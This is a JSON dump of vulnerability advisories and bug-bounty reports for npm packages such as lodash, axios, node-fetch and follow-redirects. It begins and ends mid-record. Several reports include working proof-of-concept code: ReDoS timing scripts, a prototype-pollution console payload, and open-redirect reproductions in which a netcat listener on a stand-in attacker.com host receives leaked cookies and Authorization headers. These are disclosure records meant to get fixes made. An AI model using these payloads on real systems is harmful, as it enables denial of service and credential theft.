"AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2021-09-23T07:59:21", "id": "NODEJS:1065", "href": "https://www.npmjs.com/advisories/1065", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-09-23T06:35:48", "description": "## Overview\n\nVersions of `lodash` prior to 4.17.19 are vulnerable to Prototype Pollution. The function `zipObjectDeep` allows a malicious user to modify the prototype of `Object` if the property identifiers are user-supplied. Being affected by this issue requires zipping objects based on user-provided property arrays. \n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.\n\n## Recommendation\n\nUpgrade to version 4.17.19 or later.\n\n## References\n\n- [HackerOne Report](https://hackerone.com/reports/712065)\n- [GitHub Issue](https://github.com/lodash/lodash/issues/4744)\n- [GitHub Advisory](https://github.com/advisories/GHSA-p6mc-m468-83gw)", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-05-20T01:36:49", "type": "nodejs", "title": "Prototype Pollution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2021-09-23T08:07:14", "id": "NODEJS:1523", "href": "https://www.npmjs.com/advisories/1523", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-07-28T14:37:03", "description": "## Overview\n\nVersions of `trim` lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().\n\n## Recommendation\n\nUpgrade to version 0.0.3 or later\n\n## References\n\n- [CVE](https://nvd.nist.gov/vuln/detail/CVE-2020-7753)\n- [GitHub Advisory](https://github.com/advisories/GHSA-w5p7-h5w8-2hfq)", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-05-10T18:48:44", "type": "nodejs", "title": "Regular Expression Denial of Service in trim", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753"], "modified": "2021-05-10T18:53:15", "id": "NODEJS:1700", "href": "https://www.npmjs.com/advisories/1700", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:37:03", "description": "## Overview\n\n`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.\n\n## Recommendation\n\nUpgrade to version 4.17.21 or later\n\n## References\n\n- [CVE](https://nvd.nist.gov/vuln/detail/CVE-2021-23337)\n- [GitHub Advisory](https://github.com/advisories/GHSA-35jh-r3h4-6jhm)\n- [Snyk Advisory](https://snyk.io/vuln/SNYK-JS-LODASH-1040724)", "edition": 1, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T16:14:39", "type": "nodejs", "title": "Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-05-06T16:24:12", "id": "NODEJS:1673", "href": "https://www.npmjs.com/advisories/1673", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "huntr": [{"lastseen": "2022-03-30T11:11:18", "description": "# \u270d\ufe0f Description\nA ReDoS (regular expression denial of service) flaw was found in the licia package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.\n\nSimilar to https://nvd.nist.gov/vuln/detail/CVE-2020-28500\n\n# \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Proof of Concept\nCreate the following PoC file:\n```\n// PoC.js\nvar l = require('licia');\n\nfunction build_blank (n) {\nvar ret = \"1\"\nfor (var i = 0; i < n; i++) {\nret += \" \"\n}\n\nreturn ret + \"1\";\n}\n\nvar s = build_blank(50000)\nvar time = Date.now();\nl.trim(s)\nvar time_cost = Date.now() - time;\nconsole.log(\"time_cost: \" + time_cost)\n```\nExecute the following in terminal:\n```\nnpm i licia\nnode poc.js\n```\nCheck the Output:\n```\ntime_cost: 2269\n```\n\n# \ud83d\udca5 Impact\nThis vulnerability is capable of exhausting system resources and leads to crashes.\n\ud83d\udccd Location\ntrim.js#L26", "cvss3": {}, "published": "2021-07-18T15:31:06", "type": "huntr", "title": "Inefficient Regular Expression Complexity in liriliri/licia", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2020-28500"], "modified": "2021-09-22T13:42:34", "id": "7B9EF50A-3D1D-490A-8FA4-F1EC5E3D3BBF", "href": "https://www.huntr.dev/bounties/7b9ef50a-3d1d-490a-8fa4-f1ec5e3d3bbf/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T11:12:19", "description": "# \u270d\ufe0f Description\nA ReDoS (regular expression denial of service) flaw was found in the ramda package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.\n\nSimilar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753\n\n # \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Proof of Concept\nCreate the following poc.js\n```\n// PoC.js\nvar {trim} = require(\"ramda\");\n\nfunction build_blank (n) {\nvar ret = \"1\"\nfor (var i = 0; i < n; i++) {\nret += \" \"\n}\n\nreturn ret + \"1\";\n}\n\nvar time = Date.now();\ntrim(build_blank(50000))\nvar time_cost = Date.now() - time;\nconsole.log(\"time_cost: \" + time_cost)\n```\nExecute the following command in another terminal:\n```\nnpm i ramda\nnode poc.js\n```\nCheck the Output:\n```\ntime_cost: 2639\n```\n\n# \ud83d\udca5 Impact\nThis vulnerability is capable of exhausting system resources and leads to crashes.", "cvss3": {}, "published": "2021-08-26T12:09:09", "type": "huntr", "title": "Inefficient Regular Expression Complexity in ramda/ramda", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2020-7753"], "modified": "2021-09-03T20:14:04", "id": "51DFE927-1BF1-4B36-91CA-2197337E663A", "href": "https://www.huntr.dev/bounties/51dfe927-1bf1-4b36-91ca-2197337e663a/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T11:12:19", "description": "# \u270d\ufe0f Description\nA ReDoS (regular expression denial of service) flaw was found in the apidoc-core package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.\nSimilar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753\n\n# \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Proof of Concept\nCreate the following PoC file:\n```\n// PoC.js\nvar trim = require(\"apidoc-core/lib/utils/trim\")\n\nfunction build_attack (n) {\nvar ret = \"1\"\nfor (var i = 0; i < n; i++) {\nret += \" \"\n}\n\nreturn ret + \"1\";\n}\nvar time = Date.now();\ntrim(build_attack(50000))\nvar time_cost = Date.now() - time;\nconsole.log(\"time_cost: \" + time_cost)\n```\nExecute the following command in another terminal: \n```\nnpm i apidoc-core\nnode poc.js\n```\nCheck the Output:\n```\ntime_cost: 2546\n```\n\n# \ud83d\udca5 Impact\nThis vulnerability is capable of exhausting system resources and leads to crashes.", "cvss3": {}, "published": "2021-07-16T15:30:07", "type": "huntr", "title": "Inefficient Regular Expression Complexity in apidoc/apidoc-core", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2020-7753"], "modified": "2021-09-03T18:31:54", "id": "3189C0B7-68FB-4372-A407-C6A19A22A3BF", "href": "https://www.huntr.dev/bounties/3189c0b7-68fb-4372-a407-c6a19a22a3bf/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T11:11:58", "description": "# \u270d\ufe0f Description\nIt allows cause a denial of service when formatting crafted invalid semver versions.\n\n # \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Proof of Concept\n```\n// PoC.mjs\nimport semverRegex from 'semver-regex';\n\nfor(var i = 1; i <= 50000; i++) {\n var time = Date.now();\n var attack_str = '0.0.0-0' + '.-------'.repeat(i*1) + '@';\n semverRegex().test(attack_str );\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\n}\n```", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-10T12:09:00", "type": "huntr", "title": "Inefficient Regular Expression Complexity in sindresorhus/semver-regex", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3795"], "modified": "2021-09-11T10:18:04", "id": "006624E3-35AC-448F-AAB9-7B5183F30E28", "href": "https://www.huntr.dev/bounties/006624e3-35ac-448f-aab9-7b5183f30e28/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-05T06:04:22", "description": "# Description\nInefficient regular expression complexity regex when trying to match `Potentially Trustworthy` could lead to a denial of service attack. With a formed payload `'http://' + 'a.a.'.repeat(i) + 'a'`, `76` characters payload could take `42642 ms` time execution.\n\n # Proof of Concept\n```\n// PoC.js\nimport fetch from 'node-fetch';\n\nfor (var i = 1; i <= 1000; i++) {\n var time = Date.now();\n var attack_str = 'http://' + 'a.a.'.repeat(i) + 'a'\n const response = await fetch(\n 'https://google.com'/* any valid domain */,\n { \"referrer\": attack_str }\n )\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\")\n}\n```\n\n# Output\n```\nattack_str.length: 12: 248 ms\nattack_str.length: 16: 242 ms\nattack_str.length: 20: 231 ms\nattack_str.length: 24: 231 ms\nattack_str.length: 28: 247 ms\nattack_str.length: 32: 233 ms\nattack_str.length: 36: 218 ms\nattack_str.length: 40: 244 ms\nattack_str.length: 44: 232 ms\nattack_str.length: 48: 230 ms\nattack_str.length: 52: 240 ms\nattack_str.length: 56: 263 ms\nattack_str.length: 60: 406 ms\nattack_str.length: 64: 893 ms\nattack_str.length: 68: 2908 ms\nattack_str.length: 72: 10775 ms\nattack_str.length: 76: 42642 ms\n```\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-05T04:02:46", "type": "huntr", "title": "Inefficient Regular Expression Complexity", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-08-01T06:59:29", "id": "A7E6A136-0A4B-46C4-AD20-802F1DD60BF7", "href": "https://www.huntr.dev/bounties/a7e6a136-0a4b-46c4-ad20-802f1dd60bf7/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T11:08:07", "description": "\nBUG\n======\nCookie header leaked to third party site and it allow to hijack victim account\n\n\nSUMMURY\n============\nWhen fetching a remote url with Cookie if it get ```Location``` response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.\\\nEx: you try to fetch ```example.com``` with cookie and if it get redirect url to ```attacker.com``` then it fetch that redirect url with provided cookie .\\\nSo, Cookie of ```example.com``` is leaked to ```attacker.com``` .\\\nCookie is standard way to authentication into webapp and you should not leak to other site .\\\nAll browser follow same-origin-policy so that when redirect happen browser does not send cookie of ```example.com``` to ```attacker.com``` .\n\nFLOW\n=========\nif you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .\n\nFirst setup a webserver and a netcat listner\n\nhttp://mysite.com/redirect.php?url=http://attacker.com:8182/\n===============================================\n```\n//redirect.php\n<?php\n$url=$_GET[\"url\"];\nheader(\"Location: $url\");\n\n/* Make sure that code below does not get executed when we redirect. */\nexit;\n?>\n```\nnetcat listner in http://attacker.com\n======================================\n```nc -lnvp 8182```\n\n\nSTEP TO RERPODUCE\n=================\nrun bellow code\n```\nimport fetch from 'node-fetch';\n\nconst body = {a: 1};\n\nconst response = await fetch('http://mysite.com/redirect.php?url=http://attacker.com:8182/dd', {\n\tmethod: 'post',\n\tbody: JSON.stringify(body),\n\theaders: {'Cookie': 'asd=ad'}\n});\nconst data = await response.json();\n\nconsole.log(data);\n\n```\n\nresponse received in attacker netcat\n```\nGET /dd HTTP/1.1\nCookie: asd=ad\nContent-Type: text/plain;charset=UTF-8\nAccept: */*\nUser-Agent: node-fetch/1.0 (+https://github.com/bitinn/node-fetch)\nAccept-Encoding: gzip,deflate\nConnection: close\nHost: localhost:8182\n\n```\nSee here in this response cookie is leaked to thirdparty site attacker.com.\\\nSo, here i provided cookie for mysite.com but does to redirect it leaks to thirdparty site attacker.com\n\nSUGGESTED FIX\n===============\nIf provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-05T19:40:17", "type": "huntr", "title": "Exposure of Sensitive Information to an Unauthorized Actor in node-fetch/node-fetch", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-01-14T17:02:07", "id": "D26AB655-38D6-48B3-BE15-F9AD6B6AE6F7", "href": "https://www.huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-03-14T20:37:29", "description": "# Description\nLodash 4.17.15 in use which is vulnerable to CVE-2020-8203\n\n # Proof of Concept\n \n 1) Go to https://localhost/Cockpit/modules/App/assets/vendor/lodash.js?ver=2.3.9-1676855050 and note that lodash version is 4.17.15\n 2) Go to https://localhost/Cockpit/\n 3) Open Web Devloper tools( Ctrl+Shift+I) using Firefox\n 4) Go to console \n 5) Enter _.zipObjectDeep(['__proto__.z'],[123])\n 6) console.log(z) //123 will appear everywhere based on the poc reference \n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-20T02:52:19", "type": "huntr", "title": "Lodash 4.17.15 in use which is vulnerable to CVE-2020-8203", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2020-8203", "CVE-2023-1160"], "modified": "2023-02-27T13:22:14", "id": "3CE480DC-1B1C-4230-9287-0DC3B31C2F87", "href": "https://www.huntr.dev/bounties/3ce480dc-1b1c-4230-9287-0dc3b31c2f87/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T11:12:31", "description": "# \u270d\ufe0f Description\nA ReDoS (regular expression denial of service) flaw was found in the axios package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.\n\nSimilar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753\n\n# \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Proof of Concept\nCreate the following poc.js\n```\n// poc.js\n\nvar {trim} = require(\"axios/lib/utils\");\n\n\nfunction build_blank (n) {\nvar ret = \"1\"\nfor (var i = 0; i < n; i++) {\nret += \" \"\n}\n\n\nreturn ret + \"1\";\n}\n\n\nvar time = Date.now();\ntrim(build_blank(50000))\nvar time_cost = Date.now() - time;\nconsole.log(\"time_cost: \" + time_cost)\n```\n\nExecute the following command in another terminal:\n```\nnpm i axios\nnode poc.js\n```\nCheck the Output:\n```\ntime_cost: 2639\n```\n# \ud83d\udca5 Impact\nThis vulnerability is capable of exhausting system resources and leads to crashes.\n\ud83d\udccd Location\nutils.js#L188", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-26T09:12:17", "type": "huntr", "title": "Inefficient Regular Expression Complexity in axios/axios", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753", "CVE-2021-3749"], "modified": "2021-08-30T14:03:00", "id": "1E8F07FC-C384-4FF9-8498-0690DE2E8C31", "href": "https://www.huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-30T11:08:20", "description": "\n\nBUG\n======\nCookie header leaked to third party site and it allow to hijack victim account\n\n\nSUMMURY\n============\nWhen fetching a remote url with Cookie if it get ```Location``` response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.\\\nEx: you try to fetch ```example.com``` with cookie and if it get redirect url to ```attacker.com``` then it fetch that redirect url with provided cookie .\\\nSo, Cookie of ```example.com``` is leaked to ```attacker.com``` .\\\nCookie is standard way to authentication into webapp and you should not leak to other site .\\\nAll browser follow same-origin-policy so that when redirect happen browser does not send cookie of ```example.com``` to ```attacker.com``` .\n\nFLOW\n=========\nif you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .\n\nFirst setup a webserver and a netcat listner\n\nhttp://mysite.com/redirect.php?url=http://attacker.com:8182/\n===============================================\n```\n//redirect.php\n<?php\n$url=$_GET[\"url\"];\nheader(\"Location: $url\");\n\n/* Make sure that code below does not get executed when we redirect. */\nexit;\n?>\n```\nnetcat listner in http://attacker.com\n======================================\n```nc -lnvp 8182```\n\n\nSTEP TO RERPODUCE\n=================\nrun bellow code\n```\nconst { http, https } = require('follow-redirects');\n//https://github.com/follow-redirects/follow-redirects\nconst data = JSON.stringify({\n name: 'John Doe',\n job: 'DevOps Specialist'\n});\n\nconst options = {\n protocol: 'http:',\n hostname: 'mysite.com',\n port: 80,\n path: '/redirect.php?url=http://attacker.com:8182/mm',\n method: 'GET',\n headers: {\n 'Content-Type': 'application/json'\n ,'Cookie': 'dsf=sdf',\n\t \"Authorization\":\"Basic dsfddsf\"\n }\n};\n\n\nconst req = http.request(options, (res) => {\n let data = '';\n\n res.on('data', (chunk) => {\n data += chunk;\n });\n\n res.on('end', () => {\n console.log(data);\n });\n\n}).on(\"error\", (err) => {\n console.log(\"Error: \", err.message);\n});\n\n//req.write(data);\nreq.end();\n\n```\n\nresponse received in attacker netcat\n```\nConnection from 127.0.0.1 56060 received!\nGET /mm HTTP/1.1\nContent-Type: application/json\nCookie: dsf=sdf\nHost: localhost:8182\nConnection: close\n\n```\nhere see in this response ,it leaked cookie to thirdparty site attacker.com when redirecting .\n\nSo, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com\n\nAs the redirect happen automatically via follow-redirects, user cant control where to send cookie or where to not sent .\\\nIf cookie is provided then cookie will be sent to any redirect url either it same domain url or not .\\\n\nSUGGESTED FIX\n===============\nIf provided url domain and redirect url domain is same then you can only send cookie header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie header.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-05T15:09:32", "type": "huntr", "title": " in follow-redirects/follow-redirects", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2022-01-07T19:29:17", "id": "FC524E4B-EBB6-427D-AB67-A64181020406", "href": "https://www.huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-30T11:07:00", "description": "# Note\nReclarification of [https://huntr.dev/bounties/6d9fd2bf-39e4-4291-b228-30f131b9ccdc/](https://huntr.dev/bounties/6d9fd2bf-39e4-4291-b228-30f131b9ccdc/)\n\n# Description\nThe Authorization header leaks from same hostname https-http redirect. If https://example.com redirects to http://example.com, then an attacker who can listen in on the wire (or perform a MITM attack) will be able to receive the Authorization header due to the use of the insecure HTTP protocol which does not verify the hostname the request is sending to. The attacker does NOT need to control example.com. they only need to able simply listen in on the wire (ability to perform MITM attack). A similar vulnerability for PSF's (Python Software Foundation) requests module was filed in CVE-2018-18074\n\n# Impact\nIf the attacker can intercept the HTTP request (perform MiTM attack) and https://example.com redirects to http://example.com, they may be able to leak the Authorization header during a same hostname HTTPS-HTTP redirection. They do NOT need to control the hostname.\n\n# Recommended Fix\nImplement same schema check (at least prevent leaking authorization header in HTTPS-HTTP redirection).\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-08T02:23:55", "type": "huntr", "title": "Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects/follow-redirects", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18074", "CVE-2022-0536"], "modified": "2022-02-08T10:40:37", "id": "7CF2BF90-52DA-4D59-8028-A73B132DE0DB", "href": "https://www.huntr.dev/bounties/7cf2bf90-52da-4d59-8028-a73b132de0db/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2021-12-28T02:33:31", "description": "# lodash v4.17.11\n\n[Site](https://lodash.com/) |\n[Docs](https://...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-12-01T09:18:57", "type": "githubexploit", "title": "Exploit for CVE-2019-10744", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 